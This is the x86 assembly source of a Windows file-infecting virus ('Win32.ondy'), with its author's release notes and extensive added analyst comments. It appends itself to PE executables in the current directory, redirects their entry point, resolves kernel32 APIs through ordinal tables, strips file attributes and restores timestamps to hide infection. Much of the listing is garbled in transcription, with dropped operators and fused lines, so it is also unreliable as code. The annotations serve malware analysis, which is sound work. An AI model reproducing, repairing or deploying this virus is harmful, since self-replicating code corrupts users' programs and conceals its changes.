Comment
Win32.ondy by Mort [Matrix]
Simple direct-action PE appender: infects files in the current directory by appending to the last section.
- Uses the APIs' ordinal values to reach the kernel32 APIs.
Most viruses carry some routine to locate the APIs regardless of which kernel32.dll build is present.
This one instead uses the APIs' ordinal values (the index into kernel32's export address table) to reach them.
Each API's address is computed right before it is used.
When I looked these values up on different Windows versions I found that they differ, so I have included every set of ordinal values I was able to find.
You will find them in the Ord.zip file in the Tools section.
I could not test this virus on every Windows version. It appears to work under Win2k; if you want to run it under another version,
re-check the API count first (the export-name count that selects the ordinal table).
Greetings to everyone who helped me build the ordinal log.
Microsoft: I found that my CreateFileA API is DF-sensitive. (The Win32 calling convention requires the direction flag to be clear on entry to any API, so this is expected behaviour rather than a CreateFileA bug.)
Are there more? :))))))))
"
; Target / ABI of this listing: 32-bit x86, flat model, stdcall (MASM syntax).
.486
.Model flat, stdcall
; These two imports are used only by the first-generation tail after @retadd
; (the message box + ExitProcess).  The replicated body (@ORDY..@retadd) never
; touches an import table: it resolves kernel32 APIs itself through the
; ordinal tables and @callapi below.
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
; 64-bit file time as two dwords (low, high).  Embedded three times in
; FileSearch below; pointers into those three copies are what @FinalInfection
; hands to SetFileTime.
Filetime Struc
FT_DWLOWDATETIME DD?          ; low 32 bits
FT_DWHIGHDATETIME DD?         ; high 32 bits
Filetime Ends
; Find-data record filled by FindFirstFileA / FindNextFileA.  The field order
; appears to mirror WIN32_FIND_DATAA (attributes, creation/access/write times,
; size high/low, two reserved dwords, file name, short name) -- confirm against
; the SDK before relying on exact sizes.
; Listing caveats: the closing directive reads FILESECH instead of FileSearch,
; and the name length 0260H is hexadecimal (608 bytes), not the 260-byte
; cFileName of WIN32_FIND_DATAA.  Only the *offsets* FileAttributes,
; LastWritetime, FileSizelow and Filename are used by the code (AlternateFileName
; is never referenced), so the oversize does not change behaviour.
FileSearch Struc
FileAttributes DD?            ; directory bit (010h) tested at @examine; cleared to 020h in @open, restored at @FinalInfection
CREATIONTIME FILETIME?
Lastaccesstime filetime?
LastWritetime filetime?       ; low dword is rewritten at @FileFounded and written back via SetFileTime
FILSIZEHIGH DD?
FileSizelow DD?               ; files smaller than 04000h bytes are skipped
RESERVED0 DD?
RESERVED1 DD?
Filename DB 0260H DUP (?)     ; lpFileName for SetFileAttributesA / CreateFileA; first 4 bytes also feed the marker
AlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
FILESECH ENDS
; _VSIZE: size of the replicated body (@ORDY..@retadd) rounded up to the next
; multiple of 0200h.  The operator between `0200H` and `1` (presumably `+`)
; was lost in transcription.  It is added to the host's SizeOfRawData /
; SizeOfImage at @FileFounded and is the WriteFile length at @FinalInfection.
_VSIZE = ((@retadd - @ORDY) / 0200H 1) * 0200h
; _Debug: non-zero enables a 01000h-byte pad after the entry stub and limits
; infection to names starting "GHOS" (see @FileFounded).
_Debug = 0
.DATA
DD?                           ; one uninitialised dword; no visible reference in this listing
.code
; ---------------------------------------------------------------------------
; @ORDY - entry point of the replicated body.  Generation 0 enters here as the
; EXE entry (`End @ORDY`); infected hosts enter here because their
; AddressOfEntryPoint is redirected to the appended body at @FileFounded.
; Only @ORDY..@retadd (_VSIZE bytes) is copied; the message-box tail after
; @retadd is not.
;
; Control flow: `Call @seh` never returns normally.  The return address it
; pushes is installed by @Seh as the SEH handler ([ESP+4] of the frame), and
; the body ends by faulting on purpose (fall-through into @findkernel with
; EAX = 0).  So the instructions after `Call @seh` are the exception handler:
; they unwind to our SEH frame, restore registers and RET to the host.  Any
; other exception raised during infection (bad PE, unrecognised kernel32
; build, unreadable file) lands here as well and is silently swallowed --
; the host just starts as if nothing happened.
; ---------------------------------------------------------------------------
@ORDY:
Mov Eax, @ retrad - @ORDY     ; body length; not read before @Seh zeroes EAX (it is only saved by pushad and handed back to the host by popad)
Push offset @retadd           ; final return target.  The 4-byte immediate is patched in every copy with
_retaddress EQU $ - 4         ; ImageBase + the host's original AddressOfEntryPoint (@FileFounded)
Pushhad                       ; (transcription of `pushad`) save the host's registers
Call @seh                     ; pushes the handler address and runs the body; see @Seh
; --- SEH handler entry.  The dispatcher calls here with [ESP+8] = EstablisherFrame ---
Add ESP, 8
MOV ESP, [ESP]                ; ESP := our SEH record (the frame pushed at @Seh)
POP DWORD PTR FS: [0]         ; restore the previous handler
POP EAX                       ; discard the handler address left by `Call @seh`
Popad                         ; host registers back
RET                           ; to @retadd (generation 0) or to the host's original entry point
IF _Debug
DB 01000H DUP (0); Coz of Debug Symbols, ... :(
ENDIF
; ---------------------------------------------------------------------------
; @Seh - the body proper: install the SEH frame, locate the kernel32 image,
; read its export directory, select the ordinal table whose leading word
; matches this kernel32's NumberOfNames, then walk the current directory
; (FindFirstFileA "*.*") handing every non-directory entry to @FileFounded.
; Finishes by faulting deliberately so the handler at @ORDY returns to the
; host.  The kernel32 base, the AddressOfFunctions table and the selected
; ordinal table are written into @callapi's three immediates (EBP-relative
; via the @Delta trick), so the running copy must live in writable memory.
; Listing caveat: the `+` in every `[reg disp]` operand and in the
; `[EBP label - @delta]` forms was dropped in transcription; read them as sums.
; ---------------------------------------------------------------------------
@Seh:
Push DWORD PTR FS: [0]        ; SEH record: [ESP] = previous handler, [ESP+4] = return address of `Call @seh` = our handler
MOV DWORD PTR FS: [0], ESP
XOR EAX, EAX
Call @findkernel              ; EAX := image base found by walking down from the address at [ESP+030h]
@Delta label
; The comment on the next line swallowed the following instruction,
; `mov [EBP+_KBASE-@delta], EAX`, which stores the kernel32 base into
; @callapi's third immediate.  EBP = @Delta (the return address just popped,
; still at [ESP-4]) and is the delta base for all patching below.
MOV EBP, [ESP - 4]; Get Delta Handlemov [EBP _KBASE - @delta], EAX
MOV EBX, EAX; Get Kernel Values, ...
Add Eax, DWORD PTR [EAX 03CH] ; + e_lfanew -> PE header
Add Eax, 078H                 ; -> export directory entry of the data directory
Mov Eax, [EAX]                ; export directory RVA
Add Eax, EBX                  ; -> IMAGE_EXPORT_DIRECTORY
Add Eax, 018h                 ; -> NumberOfNames
XCHG Eax, ESI
Lodsd                         ; EAX = NumberOfNames: the kernel32 build fingerprint used to pick a table
Push EAX
Lodsd                         ; AddressOfFunctions RVA
Add Eax, EBX
MOV [EBP _ADDBase - @delta], EAX   ; patch @callapi: VA of the export address table
POP EAX
; Table search.  Each table is (_ORDEND - _ORDSTART) = 24 bytes; EDI starts one
; stride *before* _ORDINALS so the first `Add` lands on the first table.  AX
; (NumberOfNames) is compared with the table's leading "APIS NUM" word.
; There is no bound: a kernel32 build matching none of the tables makes EDI
; walk past _ordinals2k into whatever follows, until a chance match (wrong
; ordinals => wrong API) or a fault caught by the handler at @ORDY.  This is
; the "works under Win2k only" caveat in the header.
Lea Edi, [EBP _ORDINALS - @Delta - (_ORDEND - _ORDSTART - 2)]
@nextordinal:
Add Edi, (_ ORDEND - _TSTART) - 2  ; (garbled: _ORDEND - _ORDSTART) stride minus the 2 bytes scasw adds
Scasw
JNZ @nextordinal
MOV [EBP _RINALBASE - @delta], EDI ; patch @callapi: first entry of the selected table (just past its count word)
; GlobalAlloc(040h = GMEM_ZEROINIT, 02000h): first 01000h bytes = find data,
; second 01000h = file-header buffer (see @FileFounded).  Pushed twice: one
; copy is consumed by FindFirstFileA, the other stays for GlobalFree.
Push 02000H
Push 040h
Mov Eax, _GlobalAlloc
Call @callapi
Push eax; for globalfree
Push EAX
Call @mask                    ; pushes the address of the inline mask string as lpFileName
DB '*. *', 0                  ; (the mask as transcribed; presumably "*.*")
@mask:
Mov Eax, _findfirstfilea
Call @callapi                 ; FindFirstFileA(mask, finddata) -- current directory only, no recursion
XCHG Eax, ESI                 ; ESI = search handle (no INVALID_HANDLE_VALUE check)
@examine:
MOV EAX, [ESP]                ; find-data buffer
Mov Al, Byte PTR [Eax FileAttributes]]
And Al, 010h
CMP Al, 010h                  ; directory bit set -> skip; every other entry is a candidate, regardless of extension
JNZ @filefounded
@nextfile:
Push DWORD PTR [ESP]          ; lpFindFileData
PUSH ESI                      ; hFindFile
Mov Eax, _findnextfilea
Call @callapi
Dec EAX                       ; assumes TRUE is exactly 1: 1 -> 0 -> continue
JZ @examine
Mov Eax, _globalfree
Call @callapi                 ; GlobalFree(finddata) -- consumes the remaining pushed copy
; Deliberate fault: EAX = 0 - x + x = 0 after the next two instructions, so the
; page loop below reads 0FFFFF000h and raises an access violation.  The SEH
; handler at @ORDY turns that into the return to the host.
XOR EAX, EAX
Sub Eax, [ESP 030H]; Cause Exception
; @findkernel - called once from above with EAX = 0.  [ESP+030h] is then the
; dword the loader left at [ESP] on entry (32 bytes pushad + 4 return
; addresses/pushes = 030h), i.e. the return address into the process-start
; code (presumably kernel32).  Step down one page at a time until a word 'MZ'
; is found and return that as the image base.  Only two bytes are checked.
@findkernel:
Add Eax, [ESP 030H]
And Eax, 0FFFFF000H
@NextPage:
Sub Eax, 01000H
CMP Word PTR [EAX], 'ZM'
JNZ @nextpage
RET
; ------------------------------------------------- -----------------------
; ---------------------------------------------------------------------------
; @RW - ReadFile / WriteFile wrapper.  The four register-contract lines below
; lost their leading `;` in transcription (they are comments, not code):
;   EDI = file handle, EAX = _Readfile or _Writefile, EDX = buffer, ECX = size.
; The `Call @fw` pushes the address of the inline `DD ?` as
; lpNumberOfBytesRead/Written -- a 4-byte variable *inside the code stream*
; that the API writes at run time.  Together with the immediate patching in
; @callapi this is why @FileFounded ORs MEM_WRITE into the host's section
; characteristics.  All registers are preserved (pushad/popad).
; ---------------------------------------------------------------------------
@RW:
EDI - File Handle
EAX - ReadFile / Writefile
EDX - Buffer
ECX - SIZE
Pushhad                       ; (transcription of `pushad`)
PUSH 0                        ; lpOverlapped = NULL
Call @fw                      ; pushes &DD below as lpNumberOfBytes
DD?
@fw:
Push ECX EDX EDI              ; nNumberOfBytes, lpBuffer, hFile (left-to-right push; hFile ends on top)
Call @callapi
Popad
RET
; ------------------------------------------------- -----------------------
; ---------------------------------------------------------------------------
; @FileFounded - candidate file handler.  Filters: size >= 04000h, 'MZ' and
; 'PE' signatures.  Then patches the in-memory copy of the first 01000h bytes
; of the file (SizeOfImage, last-section SizeOfRawData/VirtualSize/
; Characteristics, AddressOfEntryPoint), records where the body must be
; appended and what the host's original entry VA is, writes the header back
; and continues at @FinalInfection with the file still open in EDI.
; Stack contract: [ESP] = find-data pointer (see @Seh).
;
; Forensic notes (all visible in this block):
;  * @open clears the file's attributes (SetFileAttributesA 020h) *before* the
;    MZ/PE test; a non-PE file >= 04000h that is rejected at the two
;    `JNZ @nextfile` below never gets them restored (restoration happens only
;    at @FinalInfection).
;  * No bounds check on e_lfanew or the section table against the 01000h
;    header buffer, and no check that the section arithmetic stays inside it.
;  * The listing dropped every `+` in `[reg disp]` and `[EBX EDI disp]`
;    operands and fused two instruction pairs onto single lines (marked).
; ---------------------------------------------------------------------------
@FileFounded:
IF _Debug
MOV EAX, [ESP]
CMP DWORD PTR [EAX FileName], 'SOHG'   ; debug build: only names starting "GHOS"
JZ @oki
JMP @nextfile
@oki:
ENDIF
MOV EBX, [ESP]                ; EBX = find data
MOV EAX, [EBX FileSizelow]
CMP EAX, 04000H               ; skip files below 16 KiB
; Fused line: `jb @nextfile` + `mov eax, dword ptr [ebx+FileName]` (first four name bytes).
JB @nextfilemov Eax, DWORD PTR [EBX FileName]
; Infection marker: low dword of LastWriteTime is AND-ed then OR-ed with the
; name bytes, i.e. it becomes exactly the first 4 bytes of the file name and
; is written to disk by SetFileTime at @FinalInfection.  Files whose
; (time & name) == 0 are skipped.  As written, a file already carrying the
; marker passes this test again, so the marker does not appear to prevent
; re-infection -- verify against a live sample before relying on it.
And DWORD PTR [EBX LastWritetime], EAX
JZ @nextfile
OR DWORD PTR [EBX LastWritetime], EAX
Mov Edx, _ReadFile
XCHG EAX, EBX                 ; EAX = find data, EBX = _ReadFile
Add Eax, 01000H               ; second page of the GlobalAlloc block = header buffer
XCHG EAX, EDX                 ; EAX = _ReadFile, EDX = header buffer
Call @openrw                  ; open (attributes cleared) and read the first 01000h bytes; EDI = handle
Push Edx
Push EDI
Mov eax, _closehandle
Call @callapi                 ; CloseHandle; the file is reopened for the header write below
POP EDX
CLD
MOV EDI, EDX
MOV EAX, 'EPZM'               ; AX = 'MZ', upper half = 'PE'
Scasw                         ; DOS signature; EDI -> buffer+2
JNZ @nextfile                 ; (attributes already cleared by @open are not restored on this path)
SHR EAX, 010h                 ; AX = 'PE'
STD                           ; scan backwards from two bytes past the signature
Add Edi, DWORD PTR [EDI 03AH] ; + e_lfanew (read at buffer+03Ch) -> buffer+2+e_lfanew
Scasw                         ; compares the "\0\0" half and fails, stepping EDI back 2
Scasw                         ; compares 'PE'; leaves EDI = PE header - 2
JNZ @nextfile
; From here EDI = PE header - 2, so every [EDI disp] below is PE offset + 2:
;   076h -> NumberOfRvaAndSizes, 8 -> NumberOfSections, 052h -> SizeOfImage,
;   02Ah -> AddressOfEntryPoint, 036h -> ImageBase.
Mov Eax, [EDI 076H]           ; NumberOfRvaAndSizes
SHL EAX, 3                    ; * sizeof(IMAGE_DATA_DIRECTORY)
Add Eax, 052H
XCHG EAX, EBX
Movzx Eax, Word PTR [EDI 8]   ; NumberOfSections
Imul Eax, 028H                ; * sizeof(IMAGE_SECTION_HEADER)
XADD EBX, EAX                 ; EBX+EDI -> *last* section header
Mov Eax, _vsize
Add [EDI 052H], EAX; Add ImageSize
XADD [EBX EDI 010H], EAX; Eax - Old Size     ; SizeOfRawData += _VSIZE; EAX = old SizeOfRawData
Push EAX
Add Eax, [EBX EDI 014H]; add phys. Offset    ; + PointerToRawData = file offset where the body goes
MOV [EBP _VIRBODYPOFS - @delta], EAX         ; patched into @FinalInfection
POP EAX
Add Eax, [EBX EDI 0CH]        ; + VirtualAddress = RVA of the appended body
XCHG EAX, [EDI 02AH]; SET / GET Entrypoint   ; new AddressOfEntryPoint in, old one out
Add Eax, [EDI 036H]           ; + ImageBase = host's original entry VA
MOV [EBP _Retaddress - @delta], EAX; set it, ...   ; patched into the copy's `push offset @retadd` (@ORDY)
Add DWORD PTR [EBX EDI 08H], 01000H; Add Virtual Size   ; fixed 01000h, not _VSIZE
OR DWORD PTR [EBX EDI 024H], 0A0000020H      ; Characteristics |= MEM_WRITE | MEM_EXECUTE | CNT_CODE (self-patching body needs W)
Lea Eax, [EBP @FinalInfection - @delta]
Push EAX                      ; becomes the return address consumed by the RET at the end of @openrw
Mov Eax, _Writefile
; @openrw - shared tail: (re)open the file via @open, then Read/Write 01000h
; bytes from/to EDX with the API index in EAX.  Entered by `Call` for the
; header read and by fall-through for the header write.
@openrw:
MOV ECX, 01000H
; DF must be clear at any API call boundary (the STD above is still in effect
; on the write path); the author observed this as CreateFileA "DF sensitivity".
CLD; Coz of createfilea df sensitivity, ... :)))))
Call @open
Call @RW
RET
; ------------------------------------------------- -----------------------
; @seta - SetFileAttributesA(lpFileName = EAX, dwFileAttributes = EBX).
; Arguments are pushed right-to-left (attributes first), stdcall cleans up.
; Used by @open to force 020h (FILE_ATTRIBUTE_NORMAL) before CreateFileA and
; by @FinalInfection to put the original attributes back.  Clobbers EAX, EDI.
@seta:
Push EBX
Push EAX
Mov Eax, _SetFileAttributesa
Call @callapi
RET
; ------------------------------------------------- ----------------------
; API "handles": byte offset (2 bytes per entry) of each API's slot inside a
; selected ordinal table below.  @callapi adds this to the table base, reads
; the word there (ordinal*4) and indexes kernel32's AddressOfFunctions with it.
; No SetFilePointer slot exists, which is why @FinalInfection seeks by reading
; one byte at a time.
_Closehandle = 0; API Handles
_Createfilea = 2
_GlobalAlloc = 4
_GlobalFree = 6
_Writefile = 8
_Readfile = 0ah
_Findfirstfilea = 0ch
_Findnextfilea = 0EH
; Two definitions fused in transcription: `_Setendoffile = 010h` and `_setfiletime = 012h`.
_Sendoffile = 010h_setfiletime = 012h
_SETFILEATTRIBUTESA = 014H
; _ORDSIZE (garbled across two lines) is not referenced anywhere in this
; listing; the table stride is computed directly as _ORDEND - _ORDSTART.
_ORDSIZE EQU _ORDEND - _ _ORDSTART
SHL 2
; ---------------------------------------------------------------------------
; Ordinal tables, one per kernel32 build the author sampled.  Layout of each
; table (12 words, 24 bytes):
;   word 0     : "APIS NUM" = NumberOfNames of that build's export directory,
;                compared against the live value at @Seh to select the table;
;   words 1..11: (export ordinal index) * 4 = byte offset of the function's
;                RVA inside AddressOfFunctions, in the order of the _xxx
;                constants above.
; Consequences for analysis: the body is locked to exactly these builds; on
; any other kernel32 the search at @Seh overruns the tables.  The two counts
; written without an H suffix (0682, 0745) are decimal under MASM defaults,
; unlike 02A1H / 0337H -- whether that was intended cannot be told from here.
; The slot labelled "FindNextFile" is driven by _Findnextfilea; the exact
; export the author indexed is not recoverable from the listing.
; ---------------------------------------------------------------------------
_ordinals label
_ORDSTART LABEL
; --- table 1: "95" build ---
_ORDINALS95 Label
DW 0682; APIS NUM
DW 088H * 4; CloseHandle
DW 09DH * 4; CREATEFILEA
DW 01B5H * 4; GLOBALLOC
DW 01BCH * 4; GLOBALFREE
DW 02E3H * 4; Writefile
DW 0242H * 4; ReadFile
DW 0F9H * 4; FindfirstFilea
DW 0fch * 4; FindnextFile
DW 0281H * 4; setndoffile
DW 028BH * 4; SetFileTime
DW 0288H * 4; SetFileAttributesa
_ORDEND LABEL
; --- table 2: "98" build ---
_ORDINALS98 Label; (R1, SE)
DW 0745; APIS NUM
DW 09FH * 4; CloseHandle
DW 0B8H * 4; CreateFilea
DW 01E5H * 4; GLOBALLOC
DW 01ech * 4; GlobalFree
DW 0335H * 4; Writefile
DW 027DH * 4; ReadFile
DW 011BH * 4; FindfirstFilea
DW 0120H * 4; FindNextFile
DW 02C5H * 4; STENDOFFILE
DW 02CFH * 4; setFileTime
DW 02CCH * 4; SetFileAttributesa
; --- table 3: "NT" build ---
_Ordinalsnt Label
DW 02A1H; APIS NUM
DW 018H * 4; CloseHandle
DW 031H * 4; CREATEFILEA
DW 0155H * 4; GLOBALLOC
DW 015CH * 4; GLOBALFREE
DW 027BH * 4; Writefile
DW 01D6H * 4; ReadFile
DW 082H * 4; Findfirstfilea
DW 087H * 4; FindNextFile
DW 0210H * 4; STENDOFFILE
DW 021AH * 4; SetFileTime
DW 0217H * 4; SetFileAttributesa
; --- table 4: "2k" build (the one the header says was tested); nothing
; terminates the list, so an unmatched count scans past this point ---
_ordinals2k label
DW 0337H; APIS NUM
DW 01EH * 4; CloseHandle
DW 037H * 4; CreateFilea
DW 019CH * 4; GLOBALLOC
DW 01A3H * 4; GLOBALFREE
DW 030EH * 4; Writefile
DW 023DH * 4; ReadFile
DW 0A3H * 4; Findfirstfilea
DW 0ACH * 4; FINDNEXTFILE
DW 028CH * 4; SetENDOFFILE
DW 0297H * 4; SetFileTime
DW 0293H * 4; SetFileAttributesa
; ------------------------------------------------- -----------------------
; ---------------------------------------------------------------------------
; @open - open the current candidate for read/write and return the handle in
; EDI.  The "EAX - FileName" line below is a comment that lost its `;`; the
; code does NOT use EAX as input -- it reads the find-data pointer from the
; caller's stack at [ESP+028h] (020h pushad + two return addresses).
; Side effect: the file's attributes are forced to 020h (FILE_ATTRIBUTE_NORMAL)
; before CreateFileA, stripping read-only / hidden / system.  The result of
; CreateFileA is not checked (INVALID_HANDLE_VALUE flows on as the handle).
; ---------------------------------------------------------------------------
@open:
EAX - FileName
Pushhad                       ; (transcription of `pushad`)
Mov Eax, [ESP 028H]           ; find-data pointer from the outer stack
Add Eax, FileName             ; -> lpFileName
PUSH 0 0 3 0 1                ; hTemplateFile=0, dwFlagsAndAttributes=0, OPEN_EXISTING(3), lpSecurityAttributes=0, FILE_SHARE_READ(1)
Push 080000000h OR 040000000H ; GENERIC_READ | GENERIC_WRITE
Push EAX                      ; lpFileName
; Fused line: `mov ebx, 020h` + `call @seta` -> SetFileAttributesA(name, FILE_ATTRIBUTE_NORMAL)
Mov EBX, 020HCall @seta
Mov eax, _createfilea
Call @callapi
MOV [ESP], EAX; Handle To EDI ; overwrite the saved EDI slot so popad returns the handle in EDI
Popad
RET
; ------------------------------------------------- --------
; ---------------------------------------------------------------------------
; @callapi - call a kernel32 export selected by the API index in EAX (the
; first line below is a comment that lost its `;`).  The caller has already
; pushed the stdcall arguments; @callapi pops its own return address into EDI,
; resolves the address through three run-time-patched immediates, calls it
; and jumps back.  Clobbers EDI (callers rely on this, e.g. @open).
; Resolution chain, all three 012345678h placeholders are written by @Seh:
;   table[EAX]  -> ordinal*4
;   AddressOfFunctions + that -> function RVA
;   RVA + kernel32 base       -> VA
; Nothing validates the index or the resolved address; a wrong table (see the
; scan at @Seh) calls an arbitrary export with these arguments.
; ---------------------------------------------------------------------------
EAX - API Handle
@callapi:
POP EDI                       ; caller's return address
Add eax, 012345678h           ; + selected ordinal table (patched: _ORDINALBASE)
_ORDINALBASE EQU $ - 4
Movzx Eax, Word PTR [EAX]     ; ordinal*4
Add eax, 012345678h           ; + AddressOfFunctions VA (patched: _addbase)
_addbase EQU $ - 4
Mov Eax, [EAX]                ; function RVA
Add eax, 012345678h           ; + kernel32 image base (patched: _KBase)
_KBase EQU $ - 4
Call EAX
JMP EDI                       ; callee cleaned the arguments (stdcall)
; ------------------------------------------------- ---------------
; ---------------------------------------------------------------------------
; @FinalInfection - reached via the RET at the end of @openrw after the
; patched header was written back.  State: EDI = open file handle, file
; position = 01000h, EDX = header buffer, ESI = find handle,
; [ESP] = [ESP+4] = find-data pointer.
; Steps: advance the file position to the end of the last section's raw data
; by reading one byte at a time (no SetFilePointer in the ordinal table),
; write _VSIZE bytes of the running body there, SetEndOfFile, restore the
; timestamps (with the marker from @FileFounded in LastWriteTime), close,
; restore the original attributes cleared by @open, and go to the next file.
; Forensic notes: SetEndOfFile truncates anything that followed the last
; section's raw data (overlays are lost); the byte-wise seek issues one
; ReadFile per byte, so infection of a large host is very slow.
; ---------------------------------------------------------------------------
@FinalInfection:
Mov Eax, 012345678H           ; file offset for the body (patched at @FileFounded: _VIRBODYPOFS)
_VIRBODYPOFS EQU $ - 4
Sub Eax, 01000H               ; 01000h bytes are already behind the file pointer
Push EAX                      ; bytes still to skip (loop counter on the stack)
Mov Eax, _readfile
XOR ECX, ECX
Inc ECX                       ; ECX = 1 byte per read
@ nextByte2seek:
Call @RW                      ; ReadFile(EDI, EDX, 1, ...) -- seeks by consuming bytes into the header buffer
Dec dword PTR [ESP]
JNZ @ nextByte2seek
POP EAX                       ; counter reached 0, so EAX = 0
Mov ECX, _VSIZE
Lea Edx, [EBP @ORDY - @Delta] ; source = this running copy of the body
Add Eax, _Writefile           ; 0 + _Writefile: EAX = _Writefile
Call @RW                      ; WriteFile(EDI, body, _VSIZE)
PUSH ESI                      ; keep the find handle across the calls below
Push EDI EDI                  ; one handle for SetEndOfFile, one for CloseHandle
Mov Eax, _setendoffile
Call @callapi                 ; SetEndOfFile(EDI): file ends right after the body
MOV EBX, [ESP]                ; the remaining pushed handle
MOV EAX, [ESP 0CH]            ; find-data pointer
Add Eax, LastWrittime         ; (typo for LastWritetime in the listing)
Push EAX                      ; lpLastWriteTime (low dword = marker set at @FileFounded)
Sub Eax, 8
Push EAX                      ; lpLastAccessTime
Sub Eax, 8
Push EAX                      ; lpCreationTime
Push EBX                      ; hFile
Mov Eax, _SetFileTime
Call @callapi                 ; put the original timestamps back so the write is not visible by date
Mov eax, _closehandle
Call @callapi                 ; CloseHandle(EDI) -- consumes the second pushed handle
MOV EBX, [ESP 4]              ; find-data pointer (ESI is at [ESP])
MOV EAX, [EBX FileAttributes]]
XCHG EAX, EBX                 ; EAX = find data, EBX = original attributes
Add Eax, FileName
Call @seta                    ; SetFileAttributesA(name, original attributes)
POP ESI; Restore Search Handle
@FuckFile:
JMP @nextfile
; ---------------------------------------------------------------------------
; @retadd - end of the replicated body and the generation-0 payload.  In the
; original EXE the `push offset @retadd` at @ORDY is unpatched, so after the
; infection pass the handler RETs here; in infected hosts that immediate
; points at the host's entry point and this tail is never copied or run.
; The two inline strings are therefore indicators of the dropper only.
; MessageBoxA(hWnd = 0, lpText = "Hey Guys...", lpCaption = ".RDY BY MORT...",
; uType = 0): each `Call` pushes the address of the string that follows it.
; `Call EXITPROCESS, 0` is not valid MASM `call` syntax as transcribed
; (presumably an `invoke`/push+call pair in the original).
; ---------------------------------------------------------------------------
@retadd:
PUSH 0                        ; uType
Call @title                   ; pushes &caption
DB '.RDY BY MORT [Matrix]', 0
@title:
Call @mess                    ; pushes &text
DB 'Hey Guys, CreateFilea API IS DF SENSITIVE !!! :)))', 0
@mess:
PUSH 0                        ; hWnd
Call Messageboxa
Call EXITPROCESS, 0
RET
End @ORDY                     ; @ORDY is the EXE entry point of generation 0